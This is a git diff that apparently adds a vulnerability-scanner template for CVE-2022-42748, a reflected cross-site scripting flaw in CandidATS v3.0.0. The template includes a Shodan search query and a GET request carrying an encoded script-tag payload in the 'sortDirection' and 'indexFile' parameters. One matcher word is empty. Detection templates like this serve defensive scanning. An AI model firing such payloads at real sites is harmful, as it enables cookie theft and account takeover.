diff --git a/cves/2022/CVE-2022-42748.yaml b/cves/2022/CVE-2022-42748.yaml new file mode 100644 index 0000000000..6c9fbd0718 --- /dev/null +++ b/cves/2022/CVE-2022-42748.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-42748 + +info: + name: CandidATS v3.0.0 - Cross Site Scripting. + author: arafatansari + severity: medium + description: | + CandidATS v3.0.0 on 'sortDirection' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + reference: + - https://fluidattacks.com/advisories/modestep/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-42748 + classification: + cve-id: CVE-2022-42748 + metadata: + verified: true + shodan-query: http.html:"CandidATS" + tags: cve,cve2022,candidats,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'candidat' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 404